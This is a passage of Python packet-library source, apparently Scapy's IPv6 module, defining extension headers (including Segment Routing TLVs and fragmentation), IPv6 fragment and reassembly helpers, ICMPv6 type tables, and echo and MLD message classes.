    Field that exists on the packet but not on the wire: it adds nothing
    when building and consumes nothing when dissecting (its dissected
    value is always 1).
    """

    def addfield(self, pkt, s, val):
        # Nothing is written
        return s

    def getfield(self, pkt, s):
        # Nothing is read
        return s, 1

    def i2repr(self, pkt, x):
        return "On" if x else "Off"
943
944
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
    """Hop-by-Hop Options extension header (Next Header value 0)."""
    name = "IPv6 Extension Header - Hop-by-Hop Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # Header length in 8-byte units, not counting the first 8 bytes;
        # the 2 added bytes are the nh and len fields themselves.
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # The options start 2 bytes after the beginning of the header
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: (8 * (pkt.len + 1)) - 2),
    ]
    overload_fields = {IPv6: {"nh": 0}}
954
955
956# Destination Option Header #
957
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
    """Destination Options extension header (Next Header value 60)."""
    name = "IPv6 Extension Header - Destination Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # Header length in 8-byte units, not counting the first 8 bytes;
        # the 2 added bytes are the nh and len fields themselves.
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        # The options start 2 bytes after the beginning of the header
        _OptionsField("options", [], HBHOptUnknown, 2,
                      length_from=lambda pkt: (8 * (pkt.len + 1)) - 2),
    ]
    overload_fields = {IPv6: {"nh": 60}}
967
968
969# Routing Header #
970
class IPv6ExtHdrRouting(_IPv6ExtHdr):
    """Routing extension header (Next Header value 43)."""
    name = "IPv6 Option Header Routing"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # in 8 bytes blocks: two per address
        FieldLenField("len", None, count_of="addresses", fmt="B",
                      adjust=lambda pkt, x: 2 * x),
        ByteField("type", 0),
        ByteField("segleft", None),
        # There is meaning in this field ...
        BitField("reserved", 0, 32),
        IP6ListField("addresses", [],
                     length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Fill in ``segleft`` with the number of addresses when unset."""
        if self.segleft is None:
            # segleft is the 4th byte of the header
            segleft = struct.pack("B", len(self.addresses))
            pkt = b"".join((pkt[:3], segleft, pkt[4:]))
        return _IPv6ExtHdr.post_build(self, pkt, pay)
987
988
989# Segment Routing Header #
990
991# This implementation is based on RFC8754, but some older snippets come from:
992# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
993
# TLV type -> name, for the TLVs of the Segment Routing header.
# RFC 8754 sect 8.2, plus two types coming from draft 06.
_segment_routing_header_tlvs = {
    0: "Pad1 TLV",
    4: "PadN TLV",
    5: "HMAC TLV",
    # draft 06
    1: "Ingress Node TLV",
    2: "Egress Node TLV",
}
1002
1003
class IPv6ExtHdrSegmentRoutingTLV(Packet):
    """
    Generic Segment Routing header TLV (RFC 8754 sect 2.1).

    Subclasses are recorded in ``registered_sr_tlv`` by register_variant(),
    keyed by the default value of their ``type`` field, and dispatch_hook()
    uses that registry on dissection.
    """
    name = "IPv6 Option Header Segment Routing - Generic TLV"
    fields_desc = [
        ByteEnumField("type", None, _segment_routing_header_tlvs),
        ByteField("len", 0),
        StrLenField("value", "", length_from=lambda pkt: pkt.len),
    ]

    # TLV type -> class; shared by the whole hierarchy
    registered_sr_tlv = {}

    def extract_padding(self, p):
        # A TLV has no payload: what follows belongs to the next one
        return b"", p

    @classmethod
    def register_variant(cls):
        cls.registered_sr_tlv[cls.type.default] = cls

    @classmethod
    def dispatch_hook(cls, pkt=None, *args, **kargs):
        if not pkt:
            return cls
        # The first byte is the TLV type
        tlv_type = ord(pkt[:1])
        return cls.registered_sr_tlv.get(tlv_type, cls)
1026
1027
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
    """Ingress Node TLV (draft-ietf-6man-segment-routing-header-06 3.1.1)."""
    name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
    fields_desc = [
        ByteEnumField("type", 1, _segment_routing_header_tlvs),
        # reserved (1) + flags (1) + address (16)
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("ingress_node", "::1"),
    ]
1036
1037
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
    """Egress Node TLV (draft-ietf-6man-segment-routing-header-06 3.1.2)."""
    name = "IPv6 Option Header Segment Routing - Egress Node TLV"
    fields_desc = [
        ByteEnumField("type", 2, _segment_routing_header_tlvs),
        # reserved (1) + flags (1) + address (16)
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("egress_node", "::1"),
    ]
1046
1047
class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
    """
    Segment Routing Header Pad1 TLV (type 0): a single 'type' byte, without
    any length or value field.
    """
    name = "IPv6 Option Header Segment Routing - Pad1 TLV"
    # RFC8754 sect 2.1.1.1, Pad1 is a single byte
    fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs)]
1052
1053
class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
    """
    Segment Routing Header PadN TLV (type 4): a one byte 'len' followed by
    'len' bytes of padding.

    When 'len' is left to None it is derived from the length of 'padding'.
    """
    name = "IPv6 Option Header Segment Routing - PadN TLV"
    # RFC8754 sect 2.1.1.2
    fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
                   FieldLenField("len", None, length_of="padding", fmt="B"),
                   StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)]  # noqa: E501
1060
1061
class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
    """
    Segment Routing Header HMAC TLV (type 5).

    Layout: type (1 byte), len (1 byte), D flag (1 bit), reserved (15 bits),
    hmackeyid (4 bytes) and the variable length 'hmac' value.

    When 'len' is left to None it is computed from the length of 'hmac'
    (plus 48); on dissection 'hmac' spans 'len - 48' bytes.
    """
    name = "IPv6 Option Header Segment Routing - HMAC TLV"
    # RFC8754 sect 2.1.2
    fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
                   # The TLV length is a single byte, like in every other
                   # SRH TLV: fmt="B" is required, as FieldLenField would
                   # otherwise build and dissect a 2-byte length and shift
                   # all the following fields.
                   FieldLenField("len", None, length_of="hmac", fmt="B",
                                 adjust=lambda _, x: x + 48),
                   BitField("D", 0, 1),
                   BitField("reserved", 0, 15),
                   IntField("hmackeyid", 0),
                   StrLenField("hmac", "",
                               length_from=lambda pkt: pkt.len - 48)]
1073
1074
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
    """
    IPv6 Segment Routing Header (routing type 4).

    'len', 'segleft' and 'lastentry' are computed in post_build() when they
    are left to None. On dissection, 'lastentry + 1' addresses are read and
    the remaining bytes announced by 'len' are parsed as TLVs.
    """
    name = "IPv6 Option Header Segment Routing"
    # RFC8754 sect 2. + flag bits from draft 06
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteField("type", 4),
        ByteField("segleft", None),
        ByteField("lastentry", None),
        BitField("unused1", 0, 1),
        BitField("protected", 0, 1),
        BitField("oam", 0, 1),
        BitField("alert", 0, 1),
        BitField("hmac", 0, 1),
        BitField("unused2", 0, 3),
        ShortField("tag", 0),
        IP6ListField(
            "addresses", ["::1"],
            count_from=lambda pkt: (pkt.lastentry + 1),
        ),
        PacketListField(
            "tlv_objects", [],
            IPv6ExtHdrSegmentRoutingTLV,
            length_from=lambda pkt: 8 * pkt.len - 16 * (pkt.lastentry + 1),
        ),
    ]

    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """
        Complete the built header: pad it to a multiple of 8 bytes and set
        'len' (byte 1), then set 'segleft' (byte 3) and 'lastentry' (byte 4)
        from the number of addresses, each only when left to None.
        """
        if self.len is None:
            # Number of bytes missing to reach the next 8-byte boundary
            missing = -len(pkt) % 8
            if missing == 1:
                # A single byte can only be filled with a Pad1 TLV
                pkt += raw(IPv6ExtHdrSegmentRoutingTLVPad1())
            elif missing >= 2:
                # PadN: 2 bytes of type/len, the rest is zero padding
                filler = b"\x00" * (missing - 2)
                pkt += raw(IPv6ExtHdrSegmentRoutingTLVPadN(padding=filler))

            # Length in 8-byte units, not counting the first 8 bytes
            hdr_len = struct.pack("B", (len(pkt) - 8) // 8)
            pkt = pkt[:1] + hdr_len + pkt[2:]

        if self.segleft is None:
            # Index of the last address, 0 when there is no address
            segleft = max(len(self.addresses) - 1, 0)
            pkt = pkt[:3] + struct.pack("B", segleft) + pkt[4:]

        if self.lastentry is None:
            nb_addresses = len(self.addresses)
            if nb_addresses == 0:
                warning(
                    "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
                )
            last_index = max(nb_addresses - 1, 0)
            pkt = pkt[:4] + struct.pack("B", last_index) + pkt[5:]

        return _IPv6ExtHdr.post_build(self, pkt, pay)
1135
1136
1137# Fragmentation Header #
1138
class IPv6ExtHdrFragment(_IPv6ExtHdr):
    """
    IPv6 Fragment extension header: next header, 8 reserved bits, a 13-bit
    fragment offset, 2 reserved bits, the 'm' (more fragments) bit and a
    32-bit identification.
    """
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        BitField("res1", 0, 8),
        BitField("offset", 0, 13),
        BitField("res2", 0, 2),
        BitField("m", 0, 1),
        IntField("id", None),
    ]
    overload_fields = {IPv6: {"nh": 44}}

    def guess_payload_class(self, p):
        """
        Return Raw for any fragment with a non-zero offset; only the first
        fragment goes through the regular payload guessing.
        """
        if self.offset > 0:
            return Raw
        parent = super(IPv6ExtHdrFragment, self)
        return parent.guess_payload_class(p)
1154
1155
def defragment6(packets):
    """
    Performs defragmentation of a list of IPv6 packets. Packets are reordered.
    Crap is dropped. What lacks is completed by 'X' characters.

    Only the fragments sharing the identification of the first fragment
    found in 'packets' are reassembled; the other ones are dropped with a
    warning.

    :param packets: an iterable of packets; those without an
        IPv6ExtHdrFragment layer are ignored
    :return: the reassembled packet, or an empty list when 'packets'
        contains no fragment
    """

    # Remove non fragments
    lst = [x for x in packets if IPv6ExtHdrFragment in x]
    if not lst:
        return []

    frag_id = lst[0][IPv6ExtHdrFragment].id

    llen = len(lst)
    lst = [x for x in lst if x[IPv6ExtHdrFragment].id == frag_id]
    if len(lst) != llen:
        warning("defragment6: some fragmented packets have been removed from list")  # noqa: E501

    # Reorder fragments by increasing offset. sorted() is stable, so
    # fragments sharing the same offset keep their arrival order.
    res = sorted(lst, key=lambda x: x[IPv6ExtHdrFragment].offset)

    # regenerate the fragmentable part
    fragmentable = b""
    frag_hdr_len = 8
    for p in res:
        q = p[IPv6ExtHdrFragment]
        offset = 8 * q.offset  # the offset field is in 8-byte units
        if offset != len(fragmentable):
            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))  # noqa: E501
        # When plen is set, it bounds the data taken from this fragment:
        # the fragment header length is removed from it first.
        frag_data_len = p[IPv6].plen
        if frag_data_len is not None:
            frag_data_len -= frag_hdr_len
        # Fill any hole before this fragment (no-op when there is none)
        fragmentable += b"X" * (offset - len(fragmentable))
        fragmentable += raw(q.payload)[:frag_data_len]

    # Regenerate the unfragmentable part.
    q = res[0].copy()
    nh = q[IPv6ExtHdrFragment].nh
    # The layer preceding the fragment header now announces the reassembled
    # data directly, and the fragment header itself is removed.
    q[IPv6ExtHdrFragment].underlayer.nh = nh
    q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
    del q[IPv6ExtHdrFragment].underlayer.payload
    q /= conf.raw_layer(load=fragmentable)
    del q.plen

    # Rebuild and dissect again so that the reassembled data is decoded
    if q[IPv6].underlayer:
        q[IPv6] = IPv6(raw(q[IPv6]))
    else:
        q = IPv6(raw(q))
    return q
1215
1216
def fragment6(pkt, fragSize):
    """
    Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
    expected maximum size of fragment data (MTU). The list of packets is
    returned.

    If packet does not contain an IPv6ExtHdrFragment class, it is added to
    first IPv6 layer found. If no IPv6 layer exists packet is returned in
    result list unmodified.

    :param pkt: the packet to fragment. It is copied first: the caller's
        packet is not modified.
    :param fragSize: the size limit; it is compared to the length of the
        whole built packet.
    :return: a list of packets. It holds the single (copied) packet when it
        has no IPv6 layer, when it already fits in fragSize or when fragSize
        is too low to fragment; it is empty when the fragment header and its
        payload exceed 65535 bytes.
    """

    pkt = pkt.copy()

    if IPv6ExtHdrFragment not in pkt:
        if IPv6 not in pkt:
            return [pkt]

        # Insert a fragment header between the first IPv6 layer and its
        # payload; the fragment header inherits the IPv6 next header value.
        layer3 = pkt[IPv6]
        data = layer3.payload
        frag = IPv6ExtHdrFragment(nh=layer3.nh)

        layer3.remove_payload()
        # Reset nh and plen so that they are computed again at build time
        del layer3.nh
        del layer3.plen

        frag.add_payload(data)
        layer3.add_payload(frag)

    # If the payload is bigger than 65535, a Jumbo payload must be used, as
    # an IPv6 packet can't be bigger than 65535 bytes.
    if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
        warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")  # noqa: E501
        return []

    s = raw(pkt)  # for instantiation to get upper layer checksum right

    if len(s) <= fragSize:
        return [pkt]

    # Fragmentable part : fake IPv6 for Fragmentable part length computation
    fragPart = pkt[IPv6ExtHdrFragment].payload
    tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
    fragPartLen = len(tmp) - 40  # basic IPv6 header length
    # The fragmentable bytes are taken from the end of the real build
    fragPartStr = s[-fragPartLen:]

    # Grab Next Header for use in Fragment Header
    nh = pkt[IPv6ExtHdrFragment].nh

    # Keep fragment header
    fragHeader = pkt[IPv6ExtHdrFragment]
    del fragHeader.payload  # detach payload

    # Unfragmentable Part
    unfragPartLen = len(s) - fragPartLen - 8  # 8: fragment header length
    unfragPart = pkt
    del pkt[IPv6ExtHdrFragment].underlayer.payload  # detach payload

    # Cut the fragmentable part to fit fragSize. Inner fragments have
    # a length that is an integer multiple of 8 octets. last Frag MTU
    # can be anything below MTU
    lastFragSize = fragSize - unfragPartLen - 8
    innerFragSize = lastFragSize - (lastFragSize % 8)

    if lastFragSize <= 0 or innerFragSize == 0:
        warning("Provided fragment size value is too low. " +
                "Should be more than %d" % (unfragPartLen + 8))
        # Give the packet back in one piece, with its fragment header
        return [unfragPart / fragHeader / fragPart]

    remain = fragPartStr
    res = []
    fragOffset = 0     # offset, incremented during creation
    fragId = random.randint(0, 0xffffffff)  # random id ...
    if fragHeader.id is not None:  # ... except id provided by user
        fragId = fragHeader.id
    fragHeader.m = 1
    fragHeader.id = fragId
    fragHeader.nh = nh

    # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
    while True:
        if (len(remain) > lastFragSize):
            # Inner fragment: take innerFragSize bytes, more fragments follow
            tmp = remain[:innerFragSize]
            remain = remain[innerFragSize:]
            fragHeader.offset = fragOffset    # update offset
            fragOffset += (innerFragSize // 8)  # compute new one
            if IPv6 in unfragPart:
                # Let plen be computed again for this fragment
                unfragPart[IPv6].plen = None
            tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
            res.append(tempo)
        else:
            # Last fragment: carries what remains, with the 'm' bit cleared
            fragHeader.offset = fragOffset    # update offSet
            fragHeader.m = 0
            if IPv6 in unfragPart:
                unfragPart[IPv6].plen = None
            tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
            res.append(tempo)
            break
    return res
1315
1316
1317#############################################################################
1318#############################################################################
1319# ICMPv6* Classes #
1320#############################################################################
1321#############################################################################
1322
1323
# ICMPv6 type value -> name of the class implementing that message type.
# The values are class names given as strings; the commented-out entries
# are types that have no implementation listed here.
icmp6typescls = {1: "ICMPv6DestUnreach",
                 2: "ICMPv6PacketTooBig",
                 3: "ICMPv6TimeExceeded",
                 4: "ICMPv6ParamProblem",
                 128: "ICMPv6EchoRequest",
                 129: "ICMPv6EchoReply",
                 130: "ICMPv6MLQuery",  # MLDv1 or MLDv2
                 131: "ICMPv6MLReport",
                 132: "ICMPv6MLDone",
                 133: "ICMPv6ND_RS",
                 134: "ICMPv6ND_RA",
                 135: "ICMPv6ND_NS",
                 136: "ICMPv6ND_NA",
                 137: "ICMPv6ND_Redirect",
                 # 138: Do Me - RFC 2894 - Seems painful
                 139: "ICMPv6NIQuery",
                 140: "ICMPv6NIReply",
                 141: "ICMPv6ND_INDSol",
                 142: "ICMPv6ND_INDAdv",
                 143: "ICMPv6MLReport2",
                 144: "ICMPv6HAADRequest",
                 145: "ICMPv6HAADReply",
                 146: "ICMPv6MPSol",
                 147: "ICMPv6MPAdv",
                 # 148: Do Me - SEND related - RFC 3971
                 # 149: Do Me - SEND related - RFC 3971
                 151: "ICMPv6MRD_Advertisement",
                 152: "ICMPv6MRD_Solicitation",
                 153: "ICMPv6MRD_Termination",
                 # 154: Do Me - FMIPv6 Messages - RFC 5568
                 155: "ICMPv6RPL",  # RFC 6550
                 }
1356
# ICMPv6 type value -> a length in bytes.
# NOTE(review): going by the name, this is the minimal header length of each
# message type; the code using this table is outside this section - confirm.
# Types 139 and 140 have no entry.
icmp6typesminhdrlen = {1: 8,
                       2: 8,
                       3: 8,
                       4: 8,
                       128: 8,
                       129: 8,
                       130: 24,
                       131: 24,
                       132: 24,
                       133: 8,
                       134: 16,
                       135: 24,
                       136: 24,
                       137: 40,
                       # 139:
                       # 140
                       141: 8,
                       142: 8,
                       143: 8,
                       144: 8,
                       145: 8,
                       146: 8,
                       147: 8,
                       151: 8,
                       152: 4,
                       153: 4,
                       155: 4
                       }
1385
# ICMPv6 type value -> human readable name of the message type.
# Used as the enumeration of the 'type' field of the ICMPv6 classes below.
icmp6types = {1: "Destination unreachable",
              2: "Packet too big",
              3: "Time exceeded",
              4: "Parameter problem",
              100: "Private Experimentation",
              101: "Private Experimentation",
              128: "Echo Request",
              129: "Echo Reply",
              130: "MLD Query",
              131: "MLD Report",
              132: "MLD Done",
              133: "Router Solicitation",
              134: "Router Advertisement",
              135: "Neighbor Solicitation",
              136: "Neighbor Advertisement",
              137: "Redirect Message",
              138: "Router Renumbering",
              139: "ICMP Node Information Query",
              140: "ICMP Node Information Response",
              141: "Inverse Neighbor Discovery Solicitation Message",
              142: "Inverse Neighbor Discovery Advertisement Message",
              143: "MLD Report Version 2",
              144: "Home Agent Address Discovery Request Message",
              145: "Home Agent Address Discovery Reply Message",
              146: "Mobile Prefix Solicitation",
              147: "Mobile Prefix Advertisement",
              148: "Certification Path Solicitation",
              149: "Certification Path Advertisement",
              151: "Multicast Router Advertisement",
              152: "Multicast Router Solicitation",
              153: "Multicast Router Termination",
              155: "RPL Control Message",
              200: "Private Experimentation",
              201: "Private Experimentation"}
1420
1421
class _ICMPv6(Packet):
    """
    Common base of the ICMPv6 message classes: computes the checksum at
    build time and provides default hashret() / answers() implementations.
    """
    name = "ICMPv6 dummy class"
    overload_fields = {IPv6: {"nh": 58}}

    def post_build(self, p, pay):
        """
        Append the payload and, when 'cksum' is None, write the checksum
        computed over the message and its payload into bytes 2-3.
        """
        p += pay
        if self.cksum is None:
            chksum = in6_chksum(58, self.underlayer, p)
            p = p[:2] + struct.pack("!H", chksum) + p[4:]
        return p

    def hashret(self):
        return self.payload.hashret()

    def answers(self, other):
        """
        Return 1 when this message and 'other' are both ICMPv6 messages
        with the same type and code, and this message sits on top of an
        IPerror6 or of an IPv6 extension header; return 0 otherwise.
        """
        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
        # Both underlayer kinds require 'other' to be an ICMPv6 message:
        # without this grouping, "A or B and C" is evaluated as
        # "A or (B and C)" and 'other' was not checked for IPerror6.
        if (isinstance(self.underlayer, (IPerror6, _IPv6ExtHdr)) and
                isinstance(other, _ICMPv6)):
            if not ((self.type == other.type) and
                    (self.code == other.code)):
                return 0
            return 1
        return 0
1446
1447
class _ICMPv6Error(_ICMPv6):
    """
    Base class of the ICMPv6 error messages: whatever follows the message
    is always dissected as an IPerror6.
    """
    name = "ICMPv6 errors dummy class"

    def guess_payload_class(self, p):
        return IPerror6
1453
1454
class ICMPv6Unknown(_ICMPv6):
    """
    Fallback ICMPv6 message: type, code and checksum, followed by the whole
    message body kept as an opaque string.
    """
    name = "Scapy6 ICMPv6 fallback class"
    fields_desc = [ByteEnumField("type", 1, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   StrField("msgbody", "")]
1461
1462
1463# RFC 2460 #
1464
class ICMPv6DestUnreach(_ICMPv6Error):
    """
    ICMPv6 Destination Unreachable error (type 1), with a 'length' byte and
    the ICMP extension padding / extension fields shared with the IPv4 ICMP
    layer.
    """
    name = "ICMPv6 Destination Unreachable"
    fields_desc = [ByteEnumField("type", 1, icmp6types),
                   ByteEnumField("code", 0, {0: "No route to destination",
                                             1: "Communication with destination administratively prohibited",  # noqa: E501
                                             2: "Beyond scope of source address",  # noqa: E501
                                             3: "Address unreachable",
                                             4: "Port unreachable"}),
                   XShortField("cksum", None),
                   ByteField("length", 0),
                   X3BytesField("unused", 0),
                   _ICMPExtensionPadField(),
                   _ICMPExtensionField()]
    # Post-dissection hook imported from the IPv4 ICMP layer
    post_dissection = _ICMP_extpad_post_dissection
1479
1480
class ICMPv6PacketTooBig(_ICMPv6Error):
    """
    ICMPv6 Packet Too Big error (type 2), carrying an 'mtu' value that
    defaults to 1280.
    """
    name = "ICMPv6 Packet Too Big"
    fields_desc = [ByteEnumField("type", 2, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("mtu", 1280)]
1487
1488
class ICMPv6TimeExceeded(_ICMPv6Error):
    """
    ICMPv6 Time Exceeded error (type 3), with a 'length' byte and the ICMP
    extension padding / extension fields shared with the IPv4 ICMP layer.
    """
    name = "ICMPv6 Time Exceeded"
    fields_desc = [ByteEnumField("type", 3, icmp6types),
                   ByteEnumField("code", 0, {0: "hop limit exceeded in transit",  # noqa: E501
                                             1: "fragment reassembly time exceeded"}),  # noqa: E501
                   XShortField("cksum", None),
                   ByteField("length", 0),
                   X3BytesField("unused", 0),
                   _ICMPExtensionPadField(),
                   _ICMPExtensionField()]
    # Post-dissection hook imported from the IPv4 ICMP layer
    post_dissection = _ICMP_extpad_post_dissection
1500
1501
1502# The default pointer value is set to the next header field of
1503# the encapsulated IPv6 packet
1504
1505
class ICMPv6ParamProblem(_ICMPv6Error):
    """
    ICMPv6 Parameter Problem error (type 4), carrying a 'ptr' offset that
    defaults to 6.
    """
    name = "ICMPv6 Parameter Problem"
    fields_desc = [ByteEnumField("type", 4, icmp6types),
                   ByteEnumField(
                       "code", 0,
                       {0: "erroneous header field encountered",
                        1: "unrecognized Next Header type encountered",
                        2: "unrecognized IPv6 option encountered",
                        3: "first fragment has incomplete header chain"}),
                   XShortField("cksum", None),
                   IntField("ptr", 6)]
1517
1518
class ICMPv6EchoRequest(_ICMPv6):
    """
    ICMPv6 Echo Request (type 128): identifier, sequence number and
    arbitrary data.
    """
    name = "ICMPv6 Echo Request"
    fields_desc = [
        ByteEnumField("type", 128, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", 0),
        XShortField("seq", 0),
        StrField("data", ""),
    ]

    def mysummary(self):
        return self.sprintf("%name% (id: %id% seq: %seq%)")

    def hashret(self):
        # Identifier and sequence number come first, followed by the
        # payload's own hash.
        id_and_seq = struct.pack("HH", self.id, self.seq)
        return id_and_seq + self.payload.hashret()
1533
1534
class ICMPv6EchoReply(ICMPv6EchoRequest):
    """ICMPv6 Echo Reply (type 129), same layout as the Echo Request."""
    name = "ICMPv6 Echo Reply"
    type = 129

    def answers(self, other):
        """
        Tell whether this reply matches 'other': it must be an Echo Request
        with the same identifier, sequence number and data.
        """
        if not isinstance(other, ICMPv6EchoRequest):
            return False
        if self.id != other.id or self.seq != other.seq:
            return False
        return self.data == other.data
1544
1545
1546# ICMPv6 Multicast Listener Discovery (RFC2710) #
1547
# All MLD messages are sent with a link-local source address
# -> make sure of it in post_build if none is specified.
# The Hop-Limit value must be 1, and the messages must carry
# "an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest.)"
class _ICMPv6ML(_ICMPv6):
    """
    Common layout of the MLD messages defined below: type, code, checksum,
    'mrd', a reserved short and a multicast address ('mladdr').
    """
    fields_desc = [ByteEnumField("type", 130, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   ShortField("mrd", 0),
                   ShortField("reserved", 0),
                   IP6Field("mladdr", "::")]
1562
1563# general queries are sent to the link-scope all-nodes multicast
1564# address ff02::1, with a multicast address field of 0 and a MRD of
1565# [Query Response Interval]
1566# Default value for mladdr is set to 0 for a General Query, and
1567# overloaded by the user for a Multicast Address specific query
1568# TODO : See what we can do to automatically include a Router Alert
1569# Option in a Destination Option Header.
1570
1571
class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
    """
    MLD Multicast Listener Query (type 130).

    Defaults: 'mrd' of 10000, 'mladdr' of "::"; the underlying IPv6 layer
    gets ff02::1 as destination and a hop limit of 1.
    """
    name = "MLD - Multicast Listener Query"
    type = 130
    mrd = 10000  # 10s for mrd
    mladdr = "::"
    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1578
1579
1580# TODO : See what we can do to automatically include a Router Alert
1581# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
    """
    MLD Multicast Listener Report (type 131). The underlying IPv6 layer
    gets a hop limit of 1.
    """
    name = "MLD - Multicast Listener Report"
    type = 131
    overload_fields = {IPv6: {"hlim": 1, "nh": 58}}

    def answers(self, query):
        """Check the query type"""
        # True as soon as 'query' contains an ICMPv6MLQuery layer
        return ICMPv6MLQuery in query
1590
1591# When a node ceases to listen to a multicast address on an interface,
1592# it SHOULD send a single Done message to the link-scope all-routers
1593# multicast address (FF02::2), carrying in its multicast address field
1594# the address to which it is ceasing to listen
1595# TODO : See what we can do to automatically include a Router Alert
1596# Option in a Destination Option Header.
1597
1598
class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
    """
    MLD Multicast Listener Done (type 132). The underlying IPv6 layer gets
    ff02::2 as destination and a hop limit of 1.
    """
    name = "MLD - Multicast Listener Done"
    type = 132
    overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
1603
1604
1605# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) #
1606
class ICMPv6MLQuery2(_ICMPv6):  # RFC 3810
    """
    MLDv2 Multicast Listener Query (type 130): the MLD query layout
    followed by the S flag, QRV, QQIC and a counted list of source
    addresses.
    """
    name = "MLDv2 - Multicast Listener Query"
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 10000),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
        BitField("Resv", 0, 4),
        BitField("S", 0, 1),
        BitField("QRV", 0, 3),
        ByteField("QQIC", 0),
        ShortField("sources_number", None),
        IP6ListField(
            "sources", [],
            count_from=lambda pkt: pkt.sources_number,
        ),
    ]

    # RFC 3810 - 5. Message Formats
    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}

    def post_build(self, packet, payload):
        """Compute the 'sources_number' field when needed"""
        if self.sources_number is None:
            # 'sources_number' is the 16-bit field at offset 26
            count = struct.pack("!H", len(self.sources))
            packet = packet[:26] + count + packet[28:]
        return _ICMPv6.post_build(self, packet, payload)
1632
1633
class ICMPv6MLDMultAddrRec(Packet):
    """
    MLDv2 Multicast Address Record: record type, auxiliary data length,
    number of sources, multicast address, source addresses and auxiliary
    data.

    When left to None, 'auxdata_len' is the length of 'auxdata' and
    'sources_number' is the byte length of 'sources' divided by 16.
    """
    name = "ICMPv6 MLDv2 - Multicast Address Record"
    fields_desc = [ByteField("rtype", 4),
                   FieldLenField("auxdata_len", None,
                                 length_of="auxdata",
                                 fmt="B"),
                   FieldLenField("sources_number", None,
                                 length_of="sources",
                                 adjust=lambda p, num: num // 16),
                   IP6Field("dst", "::"),
                   IP6ListField("sources", [],
                                length_from=lambda p: 16 * p.sources_number),
                   StrLenField("auxdata", "",
                               length_from=lambda p: p.auxdata_len)]

    def default_payload_class(self, packet):
        """Multicast Address Record followed by another one"""
        return self.__class__
1652
1653
class ICMPv6MLReport2(_ICMPv6):  # RFC 3810
    """
    MLDv2 Multicast Listener Report (type 143): a counted list of
    Multicast Address Records.
    """
    name = "MLDv2 - Multicast Listener Report"
    fields_desc = [
        ByteEnumField("type", 143, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
        ShortField("reserved", 0),
        ShortField("records_number", None),
        PacketListField(
            "records", [],
            ICMPv6MLDMultAddrRec,
            count_from=lambda p: p.records_number,
        ),
    ]

    # RFC 3810 - 5. Message Formats
    overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}

    def post_build(self, packet, payload):
        """Compute the 'records_number' field when needed"""
        if self.records_number is None:
            # 'records_number' is the 16-bit field at offset 6
            count = struct.pack("!H", len(self.records))
            packet = packet[:6] + count + packet[8:]
        return _ICMPv6.post_build(self, packet, payload)

    def answers(self, query):
        """Check the query type"""
